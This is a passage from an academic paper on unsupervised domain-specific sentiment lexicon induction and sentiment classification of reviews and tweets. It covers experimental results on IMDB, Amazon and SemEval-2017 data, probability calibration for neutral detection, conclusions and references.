analysis of the sentiment lexicons in- duced by different methods shows that they differ only on those borderline, ambiguous words (such as “soft”) residing in the noisy overlapping region between two clusters in the vector space (see Sec- tion 3). In particular, SentProp is based on label propagation over the lexical graph of words, so it could be easily misled by noisy borderline words when sentiment clusters have considerable over- lap with each other, kind of “over-fitting” (Bishop, 2006). Furthermore, according to our experiments on the same machine, those simple linear models are 70+ times faster than SentProp. The speed dif- ference is mainly due to the fact that supervised learning algorithms only need to train on a small number of labeled words (“seeds” in our context) while semi-supervised/transductive learning algo- rithms need to train on not only a small number of labeled words but also a large number of unlabeled words. It has also been observed in our experiments that there is a typical precision/recall trade-off (Man- ning et al., 2008) for the automatic induction of se- mantic lexicons. Assuming that the classified candi- date words are added to the lexicon in the descend- ing order of their probabilities (of being either pos- itive or negative), the induced lexicon will be nois- ier and noisier when it becomes bigger and bigger. 276 Corpus Supervised Semi-Supervised/Transductive kNN LR SVMlin SVMrbf TSVM S3VM CPLE SGT SentProp AUC Standard-English 0.892 0.931 0.939 0.941 0.901 0.540 0.680 0.852 0.906 Twitter 0.849 0.900 0.895 0.895 0.770 0.521 0.651 0.725 0.860 Finance 0.711 0.944 0.942 0.932 0.665 0.561 0.836 0.725 0.916 τ Standard-English 0.469 0.495 0.498 0.495 0.487 0.038 0.162 0.409 0.440 Twitter 0.490 0.569 0.548 0.547 0.522 0.001 0.211 0.437 0.500 Table 2: Comparing the induced lexicons with their corresponding known lexicons (ground-truth) according to the ranking of sentiment words measured by AUC and Kendall’s τ. Fig. 5 shows that imposing a higher cut-off prob- ability threshold (for candidate words to enter the induced lexicon) would decrease the size of the in- duced lexicon but increase its quality (accuracy). On one hand, the induced lexicon needs to contain a suf- ficient number of sentiment words, especially when detecting sentiment from short texts, as a lexicon- based method cannot reasonably classify documents with none or too few sentiment words. On the other hand, the noise (misclassified sentiment words) in the induced lexicon would obviously have a detri- mental impact on the accuracy of the document sen- timent classifier built on top of it. Contrary to most previous work like that from Qiu et al. (2011) which tries to expand the sentiment lexicon as much as pos- sible and thus maintain a high recall, we would put more emphasis on the precision and keep a tight con- trol of the lexicon size. For us, having a small senti- ment lexicon is affordable, because our proposed ap- proach to document sentiment classification will be able to mitigate the low recall problem of lexicon- based methods by combining them with learning- based methods, which we shall talk about next. 5 Domain-Specific Sentiment Classification of Documents A domain-specific sentiment lexicon, automatically induced using the above technique, provides a solid basis for building domain-specific document senti- ment classifiers. For the experiments here, we would use a list of 7866 candidate words constructed by merging two well-known general-purpose sentiment lexicons that are both publicly available — the ‘Gen- eral Inquirer’ (Stone et al., 1966) and the sentiment lexicon from Liu (2012). This set of candidate words is itself a combined, general-purpose sentiment lex- Accuracy vs Size 0.85 0.90 0.95 1.00 Ac cu rac y 0 10 00 20 00 30 00 40 00 0.50 0.60 0.70 0.80 0.90 Cutoff probability Nu mb er of wo rds Figure 5: How the accuracy and size of an in- duced lexicon are influenced by the cut-off proba- bility threshold. icon, so we name it the GI+BL lexicon. Moreover, we would set the cut-off probability threshold to a generally good value 0.7 in our sentiment lexicon induction algorithm. Comparing the IMDB vector space including all the candidate words (Fig. 4a) with that including only the high-probability candi- date words (Fig. 4b), it is obvious that the positive and negative sentiment clusters become more clearly separated in the latter. The induced sentiment lexicon on its own could be applied directly in a lexicon-based method for sentiment classification of documents, and a reason- ably good performance could be achieved as we will show later in Table 4. However, most of the time, lexicon-based sentiment classifiers are not as effec- tive as learning-based sentiment classifiers. One rea- son is that the former tends to suffer from a poor recall. For example, with a limited size sentiment lexicon, lexicon-based methods would often fail to 277 detect the sentiment present in short texts, e.g., from Twitter, due to the lexical gap. Given the induced sentiment lexicon, we propose to use a lexicon-based sentiment classifier to classify unlabeled documents, and then use those classified documents containing at least three sentiment words as pseudo-labeled documents to be used later for the training of a learning-based sentiment classifier. The condition of “at least three sentiment words” is to ensure that only reliably classified documents would be further utilised as training examples. 5.1 Sentiment Classification of Long Texts First, we try the induced sentiment lexicons in the lexicon-based sentiment classifier pSenti (Mudinas et al., 2012) to see how good they are. Given a sen- timent lexicon, pSenti is able to perform not only binary sentiment classification but also ordinal sen- timent classification on a five-point scale. To mea- sure the binary classification performance, we use both micro-averaged F1 (miF1) and macro-averaged F1 (maF1) which are commonly used in text catego- rization (Yang and Liu, 1999). To measure the five- point scale classification performance, we use both Cohen’s κ coefficient (Manning et al., 2008) and also Root-Mean-Square Error (RMSE) (Bishop, 2006). As the baseline, we use a combined general- purpose sentiment lexicon, GI+BL, mentioned pre- viously in Section 4. As we can see from the results shown in Table 3, using the induced sentiment lex- icon for the target domain would make the lexicon- based sentiment classifier pSenti perform better than simply employing an existing general-purpose sen- timent lexicon. Moreover, using the sentiment lex- icons induced from the same domain would lead a much better performance than using the sentiment lexicons induced from a different domain. Second, to evaluate the proposed two-phase boot- strapping method, we make empirical comparisons on the IMDB and Amazon datasets using a number of representative methods for document sentiment classification: • pSenti — a concept-level lexicon-based sentiment classifier (Mudinas et al., 2012), • ProbLex-DCM — a probabilistic lexicon-based classification using the Dirichlet Compound Multinomial (DCM) likelihood to reduce effective counts for repeated words (Eisenstein, 2017), • SVMlin — Support Vector Machine with linear kernel (Joachims, 1998), • CNN — Convolutional Neural Network (Kim, 2014), • LSTM — Long Short-Term Memory, a Recurrent Neural Network (RNN) that can remember val- ues over arbitrary time intervals (Hochreiter and Schmidhuber, 1997; Dai and Le, 2015). To apply the deep learning algorithms CNN and LSTM that have a word embedding projection layer, we fix t he r eview s ize t o 5 00 w ords, t runcating re- views longer than that and padding reviews shorter than that with null values. As pointed out by Greff et al. (2017), the hidden layer size is an important hyperparameter of LSTM: usually the larger the net- work, the better the performance but the longer the training time. In our experiments, we have used an LSTM network with 400 units on the hidden layer which is the capacity that a PC with one Nvidia GTX 1080 Ti GPU can afford and a dropout (Wager et al., 2013) rate of 0.5 which is the most common setting in research literature (Srivastava et al., 2014; Hong and Fang, 2015; Cliche, 2017). As shown in Table 4, the above described two- phase bootstrapping method has been demonstrated to be beneficial: t he l earning-based s entiment clas- sifiers t rained o n p seudo-labeled d ata a re supe- rior to lexicon-based sentiment classifiers, including the state-of-the-art unsupervised sentiment classifier ProbLex-DCM (Eisenstein, 2017). Furthermore, the two-phase bootstrapping method is a general frame- work which can utilize any lexicon-based sentiment classifier t o p roduce p seudo-labeled d ata. There- fore the more sophisticated ProbLex-DCM could also be used instead of pSenti in this framework, which is likely to deliver an even higher perfor- mance. Among the three learning-based sentiment classifiers, LSTM achieved the best performance on both datasets, which is consistent with the observa- tions in other studies like Dai and Le (2015). Comparing the LSTM-based sentiment classifiers trained on pseudo-labeled and real labeled data, we can also see that using a large number of pseudo- labeled examples could achieve a similar effect as using 25/4 ≈ 6k and 8/2 = 4k real labeled ex- amples for IMDB and Amazon respectively. This suggests that the unsupervised approach is actually preferable to the supervised approach if there are 278 Lexicon binary 5-point scale miF1 maF1 F pos 1 F neg 1 Cohen’s κ RMSE general-purpose GI+BL 0.745 0.744 0.764 0.722 0.235 1.325 domain-specific same domain (Kitchen) 0.761 0.761 0.772 0.750 0.236 1.310 different domain (Electronics) 0.749 0.749 0.750 0.749 0.215 1.373 different domain (Video) 0.736 0.735 0.752 0.717 0.206 1.372 Table 3: Lexicon-based sentiment classification of Amazon Kitchen product reviews. Method IMDB Amazon AUC F1 AUC F1 Unsupervised Lexicon- based pSenti with existing general-purpose lexicon 0.808 0.705 0.818 0.747 pSenti with induced domain-specific lexicon 0.841 0.768 0.839 0.771 ProbLex-DCM (Eisenstein, 2017) 0.884 0.806 0.836 0.756 Learning- based SVMlin trained on pseudo-labeled data 0.863 0.771 0.845 0.763 CNN trained on pseudo-labeled data 0.879 0.781 0.849 0.773 LSTM trained on pseudo-labeled data 0.890 0.810 0.850 0.776 Supervised Learning- based LSTM trained on real labeled data (full size) 0.971 0.912 0.878 0.802 ” (1/2 size) 0.934 0.862 0.852 0.752 ” (1/4 size) 0.892 0.821 0.841 0.744 ” (1/8 size) 0.850 0.746 0.831 0.735 Table 4: Sentiment classification of long texts. only a few thousand (or less) labeled examples. 5.2 Sentiment Classification of Short Texts To evaluate our proposed approach to sentiment classification of short texts, we have carried out experiments on the Twitter sentiment classification benchmark dataset from SemEval-2017 Task 4B (Rosenthal et al., 2017) which is to classify 6185 tweets as either positive or negative. Other than the training set of 20,508 tweets, we also collected un- labeled tweets using the Twitter API. All the tweets would be pre-processed by replacing emoticons with their corresponding text representations and encod- ing URLs by tokens. In addition to the Twitter- domain seed words listed in Table 1, we have also made use of common positive/negative emoticons which are ubiquitous on Twitter as additional seeds for the task of sentiment lexicon induction. Note that in all our experiments, we do not use the sen- timent labels and the topic information provided in the training data. Making use of the provided training data and our own unlabeled data collected from Twitter, we have constructed the domain-specific word embeddings, induced the sentiment lexicon, and bootstrapped the pseudo-labeled tweet data to train the binary tweet sentiment classifier. As the learning algorithm we have chosen LSTM with a hidden layer of 150 units which would be enough for tweets as they are quite short (with an average length of only 20 words). The official performance measures for this short text sentiment classification task (Rosenthal et al., 2017) include Accuracy (Acc) and F1. Although our approach is nearly-unsupervised (without any reliance on labeled documents), its performance on this benchmark dataset is comparable to that of su- pervised methods: it would be placed roughly in the middle of all the participating systems in this com- petition (see Table 5). 5.3 Detecting Neutral Sentiment Many real-world applications of sentiment classifi- cation (e.g., on social media) are not simply a bi- nary classification task, but involve a neutral cate- gory as well. Although many lexicon-based sen- timent classifiers including pSenti can detect neu- tral sentiment, extending the above learning-based sentiment classifier (trained on pseudo-labeled data) 279 System Acc F1 Unsupervised Baseline all positive 0.398 0.285 Baseline all negative 0.602 0.376 OursLSTM 0.804 0.795 Supervised Worst system 0.412 0.372 Median system 0.802 0.801 Best system 0.897 0.890 Table 5: Sentiment classification of short texts into two categories — SemEval-2017 Task 4B. to recognize neutral sentiment is challenging. To investigate this issue, we have done experiments on the Twitter sentiment classification benchmark dataset from SemEval-2017 Task 4C (Rosenthal et al., 2017) which is to classify 12379 tweets into an ordinal five-point scale (−2, −1, 0, +1, +2) where 0 represents the neutral class. One common way to handle neutral sentiment is to treat the set of neutral documents as a sepa- rate class for the classification algorithm, which is the method advocated by Koppel and Schler (2006). With the pseudo-labeled training examples of three classes (−1: negative, 0: neutral, and +1: posi- tive), we tried both standard multi-class classifica- tion (Hsu and Lin, 2002) and ordinal classification (Frank and Hall, 2001). However, neither of them could deliver a reasonable performance. After care- fully inspecting the classification results, we realised that it is very difficult to have a set of representative training examples with good coverage for the neu- tral class. This is because the neutral class is not homogeneous: a document could be neutral because it is equally positive and negative, or because it does not contain any sentiment. In practice, the latter case is more often seen than the former case, and it im- plies that the neutral class is more often defined by the absence of sentiment word features rather than their presence, which would be problematic to most supervised learning algorithms. What we discovered is that the simple method of identifying neutral documents from the binary sentiment classifier’s decision boundary works sur- prisingly well, as long as the right thresholds are found. Specifically, we take the probabilistic out- puts of a binary sentiment classifier trained as be- fore, and then put all the documents whose proba- bility of being positive lies not close to 0, not close to 1, but in the middle range into the neutral class. It turns out that probability calibration (Niculescu- Mizil and Caruana, 2005) is crucially important for this simple method to work. Some supervised learn- ing algorithms for classification can give poor es- timates of the class probabilities, and some even do not support probability prediction. For instance, maximum-margin learning algorithms such as SVM focus on hard samples that are close to the deci- sion boundary (the support vectors), which makes their probability prediction biased. The technique of probability calibration allows us to better calibrate the probabilities of a given classifier, or to add sup- port for probability prediction. If a classifier is well calibrated, its probabilistic output should be able to be directly interpreted as a confidence level on the prediction. For example, among the documents to which such a calibrated binary classifier gives a probabilistic output close to 0.8, approximately 80% of the documents would actually belong to the posi- tive class. Using the sigmoid model of Platt (2000) with cross-validation on the pseudo-labeled training data, we carry out probability calibration for our LSTM based binary sentiment classifier. Fig. 6 shows that the calibrated probability prediction aligns with the true confidence of prediction much better than the raw probability prediction. In this case, the Brier loss (Brier, 1950) that measures the mean squared difference between the predicted probability and the actual outcome could be reduced from 0.182 to 0.153 by probability calibration. If we rank the estimated probabilities of being positive from low to high, the curve of probabili- ties would be in an “S”-shape with a distinct middle range where the slope is steeper than the two ends, as shown in Fig. 7. The documents with their probabil- ities of being positive in such a middle range should be neutral. Therefore the two elbow points in the probability curve would make appropriate thresh- olds for the identification of neutral sentiment, and they could be found automatically by a simple algo- rithm using the central difference to approximate the second derivative. Let pL and pU denote the identi- fied thresholds (pL < pU ), then we assign class label “−1” to all those documents with the probability be- low pL , “+1” to all those documents with the proba- 280 System MAEµ MAEM miF1 maF1 Unsupervised Baseline all -2 1.895 2.000 0.006 0.014 Baseline all -1 0.923 1.400 0.089 0.286 Baseline all 0 0.525 1.200 0.133 0.500 Baseline all +1 1.127 1.400 0.063 0.188 Baseline all +2 2.105 2.000 0.004 0.011 Lexicon-based 0.939 1.135 0.253 0.189 OursLSTM 0.536 0.815 0.537 0.326 Supervised Worst system 0.985 1.325 0.250 0.121 Median system 0.509 0.823 0.545 0.299 Best system 0.554 0.481 0.504 0.405 Table 6: Sentiment classification of short texts on a five-point scale — SemEval-2017 Task 4C. 0.0 0.2 0.4 0.6 0.8 1.0 Mean predicted value 0.0 0.2 0.4 0.6 0.8 1.0 Fr ac tio n of p os iti ve s raw (0.182) calibrated (0.153) perfectly calibrated (0) Figure 6: The probability calibration plot of our LSTM-based sentiment classifier on the SemEval- 2017 Task 4C dataset. bility above pU , and “0” to all those documents with the probability within [pL,pU]. The official performance measures for this sen- timent classification task (Rosenthal et al., 2017) are MAEµ and MAEM which stand for micro- averaged and macro-averaged Mean Absolute Er- ror (MAE), respectively. We would also like to report the micro-averaged and macro-averaged F1 scores which are denoted as miF1 and maF1 respec- tively. As shown in Fig. 7, the thresholds identi- fied from the raw probability curve are roughly at 55 percentile and 75 percentile, which would yield MAEµ = 0.632 and MAEM = 0.832; the thresh- olds identified from the calibrated probability curve are roughly at 40 percentile and 80 percentile, which would yield much better scores MAEµ = 0.536 and MAEM = 0.815. So with the help of probabil- ity calibration, our proposed approach would be able to comfortably beat all the baselines including the lexicon-based method pSenti (Mudinas et al., 2012) and compete with the average (median) participat- ing systems (see Table 6). Please note that this is not a fair comparison: our approach is at a great disadvantage because (i) it is nearly-unsupervised, without any reliance on labeled documents while all the other systems are supervised; and (ii) it performs only ternary classification while all the other sys- tems make classification on the full five-point scale. 6 Conclusions How far can we go in sentiment classification for a new domain, given only unlabeled data? This pa- per presents our exploration towards answering the above research question. Specifically, the main con- tributions of this paper are as follows. • We have formulated the cluster hypothesis for sentiment analysis (i.e., words with different sen- timent polarities form distinct clusters) and veri- fied that in general it holds for word embeddings within a specific domain but not across domains. • We have demonstrated that a quality domain- specific sentiment lexicon can be induced from the word embeddings of that domain together with just a few seed words. Surprisingly, simple lin- ear model based supervised learning algorithms (such as linear SVM) are good enough for this purpose; there is no benefit of utilizing non-linear models or semi-supervised/transductive learning algorithms due to the noise at the borders of sen- timent word clusters. Using such linear models 281 0 20 40 60 80 100 percentile 0.0 0.2 0.4 0.6 0.8 1.0 pr ob ab ili ty (a) raw 0 20 40 60 80 100 percentile 0.0 0.2 0.4 0.6 0.8 1.0 pr ob ab ili ty (b) calibrated Figure 7: The probability curve with a region of intermediate probabilities representing the neutral class. our system clearly outperforms the state-of-the- art sentiment lexicon induction method — Sent- Prop (Hamilton et al., 2016). • We have shown that a lexicon-based sentiment classifier could be enhanced by using its out- puts as pseudo-labels and employing supervised learning algorithms such as LSTM to train a learning-based sentiment classifier on pseudo- labeled documents. Our end-to-end pipelined ap- proach which, overall, is unsupervised (except for a very small set of seed words), works bet- ter than the state-of-the-art unsupervised tech- nique for document sentiment classification — ProbLex-DCM (Eisenstein, 2017), and its perfor- mance is at least on par with an average fully supervised sentiment classifier trained on real la- beled data (Rosenthal et al., 2017). • We have revealed the crucial importance of prob- ability calibration to the detection of neutral sen- timent which was overlooked in previous studies (Koppel and Schler, 2006). With the right thresh- olds found, neutral documents can be simply iden- tified at the binary sentiment classifier’s decision boundary. One promising way to further enhance the LSTM- based sentiment classifier in the proposed approach with the induced sentiment lexicon would be to con- catenate word embeddings with an indicator feature which tells whether a current word is positive, neu- tral, or negative (Ebert et al., 2015). We leave this for future work. Acknowledgements The Titan X Pascal GPU used for this research was kindly donated by the NVIDIA Corporation. We thank the reviewers for their constructive and help- ful comments. We also gratefully acknowledge the support of Geek.AI for this work. References Shlomo Argamon, Casey Whitelaw, Paul J. Chase, Sob- han Raj Hota, Navendu Garg, and Shlomo Levitan. 2007. Stylistic text classification using functional lexi- cal features. Journal of the American Society for Infor- mation Science and Technology (JASIST), 58(6):802– 822. Christopher M. Bishop. 2006. Pattern Recognition and Machine Learning. Springer-Verlag. John Blitzer, Mark Dredze, and Fernando Pereira. 2007. Biographies, bollywood, boom-boxes and blenders: Domain adaptation for sentiment classification. In Proceedings of the 45th Annual Meeting of the As- sociation for Computational Linguistics (ACL), pages 440––447, Prague, Czech Republic. Danushka Bollegala, David J. Weir, and John A. Car- roll. 2013. Cross-domain sentiment classification us- ing a sentiment sensitive thesaurus. IEEE Transac- tions on Knowledge and Data Engineering (TKDE), 25(8):1719–1731. Johan Bollen, Huina Mao, and Xiao-Jun Zeng. 2011. Twitter mood predicts the stock market. Journal of Computational Science, 2(1):1–8. Glenn W. Brier. 1950. Verification of forecasts ex- pressed in terms of probability. Monthly Weather Re- view, 78(1):1–3. 282 Mathieu Cliche. 2017. BB twtr at SemEval-2017 Task 4: Twitter sentiment analysis with CNNs and LSTMs. In Proceedings of the 11th International Workshop on Se- mantic Evaluation (SemEval@ACL 2017), pages 573– 580, Vancouver, Canada. Andrew M. Dai and Quoc V. Le. 2015. Semi-supervised sequence learning. In Advances in Neural Information Processing Systems 28: Annual Conference on Neural Information Processing Systems (NIPS), pages 3079– 3087, Montreal, Canada. Xiaowen Ding, Bing Liu, and Philip S. Yu. 2008. A holistic lexicon-based approach to opinion mining. In Proceedings of the International Conference on Web Search and Web Data Mining (WSDM), pages 231– 240, Palo Alto, CA, USA. Sebastian Ebert, Ngoc Thang Vu, and Hinrich Schütze. 2015. A linguistically informed convolutional neu- ral network. In Proceedings of the 6th Workshop on Computational Approaches to Subjectivity, Sentiment and Social Media Analysis (WASSA@EMNLP), pages 109–114, Lisbon, Portugal. Jacob Eisenstein. 2017. Unsupervised learning for lexicon-based classification. In Proceedings of the 31st AAAI Conference on Artificial Intelligence (AAAI), pages 3188–3194, San Francisco, CA, USA. Ethan Fast, Binbin Chen, and Michael S. Bernstein. 2016. Empath: Understanding topic signals in large- scale text. In Proceedings of the 2016 CHI Conference on Human Factors in Computing Systems (CHI), pages 4647–4657, San Jose, CA, USA. Eibe Frank and Mark A. Hall. 2001. A simple approach to ordinal classification. In Proceedings of the 12th European Conference on Machine Learning (ECML), pages 145–156, Freiburg, Germany. Fabian Gieseke, Antti Airola, Tapio Pahikkala, and Oliver Kramer. 2012. Sparse quasi-Newton opti- mization for semi-supervised support vector machines. In Proceedings of the 1st International Conference on Pattern Recognition Applications and Methods (ICPRAM), pages 45–54, Vilamoura, Algarve, Portu- gal. Xavier Glorot, Antoine Bordes, and Yoshua Bengio. 2011. Domain adaptation for large-scale sentiment classification: A deep learning approach. In Pro- ceedings of the 28th International Conference on Ma- chine Learning (ICML), pages 513–520, Bellevue, WA, USA. Yoav Goldberg. 2017. Neural network methods for natu- ral language processing. Synthesis Lectures on Human Language Technologies, 10(1):1–309. Klaus Greff, Rupesh Kumar Srivastava, Jan Koutnı́k, Bas R. Steunebrink, and Jürgen Schmidhuber. 2017. LSTM: A search space odyssey. IEEE Transactions on Neural Networks and Learning Systems (TNNLS), 28(10):2222–2232. William L. Hamilton, Kevin Clark, Jure Leskovec, and Dan Jurafsky. 2016. Inducing domain-specific senti- ment lexicons from unlabeled corpora. In Proceedings of the 2016 Conference on Empirical Methods in Nat- ural Language Processing (EMNLP), pages 595–605, Austin, TX, USA. Trevor Hastie, Robert Tibshirani, and Jerome Friedman. 2009. The Elements of Statistical Learning: Data Mining, Inference, and Prediction. Springer, 2nd edi- tion. Sepp Hochreiter and Jürgen Schmidhuber. 1997. Long short-term memory. Neural Computation, 9(8):1735– 1780. James Hong and Michael Fang. 2015. Sentiment anal- ysis with deeply learned distributed representations of variable length texts. Technical report, Stanford Uni- versity. Chih-Wei Hsu and Chih-Jen Lin. 2002. A comparison of methods for multiclass support vector machines. IEEE Transactions on Neural Networks (TNN), 13(2):415– 425. Minqing Hu and Bing Liu. 2004. Mining and summa- rizing customer reviews. In Proceedings of the 10th ACM SIGKDD International Conference on Knowl- edge Discovery and Data Mining (KDD), pages 168– 177, Seattle, WA, USA. Yohan Jo and Alice H. Oh. 2011. Aspect and sentiment unification model for online review analysis. In Pro- ceedings of the 4th International Conference on Web Search and Web Data Mining (WSDM), pages 815– 824, Hong Kong, China. Thorsten Joachims. 1998. Text categorization with sup- port vector machines: Learning with many relevant features. In Proceedings of the 10th European Confer- ence on Machine Learning (ECML), pages 137–142, Chemnitz, Germany. Thorsten Joachims. 1999. Transductive inference for text classification using support vector machines. In Proceedings of the 16th International Conference on Machine Learning (ICML), pages 200–209, Bled, Slovenia. Thorsten Joachims. 2003. Transductive learning via spectral graph partitioning. In Proceedings of the 20th International Conference on Machine Learning (ICML), pages 290–297, Washington, DC, USA. Yoon Kim. 2014. Convolutional neural networks for sen- tence classification. In Proceedings of the 2014 Con- ference on Empirical Methods in Natural Language Processing (EMNLP), pages 1746–1751, Doha, Qatar. Moshe Koppel and Jonathan Schler. 2006. The im- portance of neutral examples for learning sentiment. Computational Intelligence, 22(2):100–109. 283 Yann LeCun, Yoshua Bengio, and Geoffrey E. Hinton. 2015. Deep learning. Nature, 521(7553):436–444. Heeyoung Lee, Mihai Surdeanu, Bill MacCartney, and Dan Jurafsky. 2014. On the importance of text anal- ysis for stock price prediction. In Proceedings of the 9th International Conference on Language Resources and Evaluation (LREC), pages 1170–1175, Reykjavik, Iceland. Chenghua Lin and Yulan He. 2009. Joint sentiment/topic model for sentiment analysis. In Proceedings of the 18th ACM Conference on Information and Knowledge Management (CIKM), pages 375–384, Hong Kong, China. Bing Liu. 2012. Sentiment analysis and opinion mining. Synthesis Lectures on Human Language Technologies, 5(1):1–167. Bing Liu. 2015. Sentiment Analysis — Mining Opin- ions, Sentiments, and Emotions. Cambridge Univer- sity Press. Marco Loog. 2016. Contrastive pessimistic likelihood estimation for semi-supervised classification. IEEE Transactions on Pattern Analysis and Machine Intel- ligence (TPAMI), 38(3):462–475. Andrew L. Maas, Raymond E. Daly, Peter T. Pham, Dan Huang, Andrew Y. Ng, and Christopher Potts. 2011. Learning word vectors for sentiment analysis. In Pro- ceedings of the 49th Annual Meeting of the Association for Computational Linguistics (ACL), pages 142–150, Portland, OR, USA. Christopher D. Manning, Prabhakar Raghavan, and Hin- rich Schütze. 2008. Introduction to Information Re- trieval. Cambridge University Press. Julian J. McAuley and Jure Leskovec. 2013. Hidden fac- tors and hidden topics: Understanding rating dimen- sions with review text. In Proceedings of the 7th ACM Conference on Recommender Systems (RecSys), pages 165–172, Hong Kong, China. Tomas Mikolov, Ilya Sutskever, Kai Chen, Gregory S. Corrado, and Jeffrey Dean. 2013. Distributed rep- resentations of words and phrases and their composi- tionality. In Advances in Neural Information Process- ing Systems 26: Annual Conference on Neural Infor- mation Processing Systems (NIPS), pages 3111–3119, Lake Tahoe, NV, USA. George A Miller and Walter G Charles. 1991. Contex- tual correlates of semantic similarity. Language and Cognitive Processes, 6(1):1–28. Saif M. Mohammad and Peter D. Turney. 2010. Emo- tions evoked by common words and phrases: Using Mechanical Turk to create an emotion lexicon. In Pro- ceedings of the NAACL HLT 2010 Workshop on Com- putational Approaches to Analysis and Generation of Emotion in Text (CAAGET), pages 26–34, Los Ange- les, CA, USA. Andrius Mudinas, Dell Zhang, and Mark Levene. 2012. Combining lexicon and learning based approaches for concept-level sentiment analysis. In Proceedings of the 1st International Workshop on Issues of Sentiment Discovery and Opinion Mining (WISDOM@KDD), pages 5:1–5:8, Beijing, China. Alexandru Niculescu-Mizil and Rich Caruana. 2005. Predicting good probabilities with supervised learning. In Proceedings of the 22nd International Conference on Machine Learning (ICML), pages 625–632, Bonn, Germany. Sara Owsley, Sanjay Sood, and Kristian J. Hammond. 2006. Domain specific affective classification of doc- uments. In AAAI Spring Symposium: Computational Approaches to Analyzing Weblogs, pages 181–183, Stanford, CA, USA. Sinno Jialin Pan, Xiaochuan Ni, Jian-Tao Sun, Qiang Yang, and Zheng Chen. 2010. Cross-domain senti- ment classification via spectral feature alignment. In Proceedings of the 19th International Conference on World Wide Web (WWW), pages 751–760, Raleigh, NC, USA. Bo Pang and Lillian Lee. 2004. A sentimental education: Sentiment analysis using subjectivity summarization based on minimum cuts. In Proceedings of the 42nd Annual Meeting of the Association for Computational Linguistics (ACL), pages 271–278, Barcelona, Spain. Bo Pang, Lillian Lee, and Shivakumar Vaithyanathan. 2002. Thumbs up? Sentiment classification using ma- chine learning techniques. In Proceedings of the ACL- 02 Conference on Empirical Methods in Natural Lan- guage Processing (EMNLP), pages 79–86, Strouds- burg, PA, USA. Jeffrey Pennington, Richard Socher, and Christopher D. Manning. 2014. Glove: Global vectors for word rep- resentation. In Proceedings of the 2014 Conference on Empirical Methods in Natural Language Process- ing (EMNLP), pages 1532–1543, Doha, Qatar. John Platt, 2000. Advances in Large Margin Classi- fiers, chapter Probabilistic Outputs for Support Vector Machines and Comparisons to Regularized Likelihood Methods. MIT Press. Robert Plutchik, 1984. Approaches To Emotion, chap- ter Emotions: A General Psychoevolutionary Theory, pages 197–219. Psychology Press. Guang Qiu, Bing Liu, Jiajun Bu, and Chun Chen. 2011. Opinion word expansion and target extraction through double propagation. Computational Linguis- tics, 37(1):9–27. Alec Radford, Rafal Józefowicz, and Ilya Sutskever. 2017. Learning to generate reviews and discovering sentiment. CoRR, abs/1704.01444. Filipe N Ribeiro, Matheus Araújo, Pollyanna Gonçalves, Marcos André Gonçalves, and Fabrı́cio Benevenuto. 284 2016. Sentibench — A benchmark comparison of state-of-the-practice sentiment analysis methods. EPJ Data Science, 5(1):1–29. Sara Rosenthal, Preslav Nakov, Svetlana Kiritchenko, Saif Mohammad, Alan Ritter, and Veselin Stoyanov. 2015. SemEval-2015 Task 10: Sentiment analysis in Twitter. In Proceedings of the 9th International Work- shop on Semantic Evaluation (SemEval@NAACL- HLT), pages 451–463, Denver, CO, USA. Sara Rosenthal, Noura Farra, and Preslav Nakov. 2017. SemEval-2017 Task 4: Sentiment analysis in Twit- ter. In Proceedings of the 11th International Workshop on Semantic Evaluation (SemEval@ACL), pages 502– 518, Vancouver, Canada. Sascha Rothe, Sebastian Ebert, and Hinrich Schütze. 2016. Ultradense word embeddings by orthogonal transformation. In Proceedings of the 2016 Con- ference of the North American Chapter of the Asso- ciation for Computational Linguistics: Human Lan- guage Technologies (HLT-NAACL), pages 767–777, San Diego, CA, USA. Nitish Srivastava, Geoffrey E. Hinton, Alex Krizhevsky, Ilya Sutskever, and Ruslan Salakhutdinov. 2014. Dropout: A simple way to prevent neural networks from overfitting. Journal of Machine Learning Re- search (JMLR), 15(1):1929–1958. Philip J. Stone, Dexter C. Dunphy, Marshall S. Smith, and Daniel M. Ogilvie. 1966. The General Inquirer: A Computer Approach to Content Analysis. MIT Press. Songbo Tan, Xueqi Cheng, Yuefen Wang, and Hongbo Xu. 2009. Adapting naı̈ve Bayes to domain adapta- tion for sentiment analysis. In Proceedings of the 31th European Conference on IR Research (ECIR), pages 337–349, Toulouse, France. Mike Thelwall, Kevan Buckley, Georgios Paltoglou, Di Cai, and Arvid Kappas. 2010. Sentiment strength detection in short informal text. Journal of the Amer- ican Society for Information Science and Technology (JASIST), 61(12):2544–2558. Mike Thelwall, Kevan Buckley, and Georgios Paltoglou. 2012. Sentiment strength detection for the social web. Journal of the American Society for Information Sci- ence and Technology (JASIST), 63(1):163–173. Peter D. Turney. 2002. Thumbs up or thumbs down? Semantic orientation applied to unsupervised classifi- cation of reviews. In Proceedings of the 40th Annual Meeting of the Association for Computational Linguis- tics (ACL), pages 417–424, Philadelphia, PA, USA. Laurens van der Maaten and Geoffrey E. Hinton. 2008. Visualizing data using t-SNE. Journal of Machine Learning Research (JMLR), 9(Nov):2579–2605. Stefan Wager, Sida I. Wang, and Percy Liang. 2013. Dropout training as adaptive regularization. In Ad- vances in Neural Information Processing Systems 26: Annual Conference on Neural Information Process- ing Systems (NIPS), pages 351–359, Lake Tahoe, NV, USA. Amy Beth Warriner, Victor Kuperman, and Marc Brys- baert. 2013. Norms of valence, arousal, and domi- nance for 13,915 English lemmas. Behavior Research Methods, 45(4):1191–1207. Rui Xia, Chengqing Zong, Xuelei Hu, and Erik Cambria. 2013. Feature ensemble plus sample selection: Do- main adaptation for sentiment classification. IEEE In- telligent Systems, 28(3):10–18. Yi Yang and Jacob Eisenstein. 2015. Putting things in context: Community-specific embedding projections for sentiment analysis. CoRR, abs/1511.06052. Yiming Yang and Xin Liu. 1999. A re-examination of text categorization methods. In Proceedings of the 22nd Annual International ACM SIGIR Conference on Research and Development in Information Retrieval (SIGIR), pages 42–49, Berkeley, CA, USA. Yasuhisa Yoshida, Tsutomu Hirao, Tomoharu Iwata, Masaaki Nagata, and Yuji Matsumoto. 2011. Trans- fer learning for multiple-domain sentiment analysis - identifying domain dependent/independent word po- larity. In Proceedings of the 25th AAAI Conference on Artificial Intelligence (AAAI), San Francisco, CA, USA. Lei Zhang, Riddhiman Ghosh, Mohamed Dekhil, Me- ichun Hsu, and Bing Liu. 2011. Combining lexicon- based and learning-based methods for Twitter senti- ment analysis. Technical Report HPL-2011-89, HP Laboratories. Xiaojin Zhu, Zoubin Ghahramani, and John D. Lafferty. 2003. Semi-supervised learning using Gaussian fields and harmonic functions. In Proceedings of the 20th In- ternational Conference on Machine Learning (ICML), pages 912–919, Washington, DC, USA. 285 286 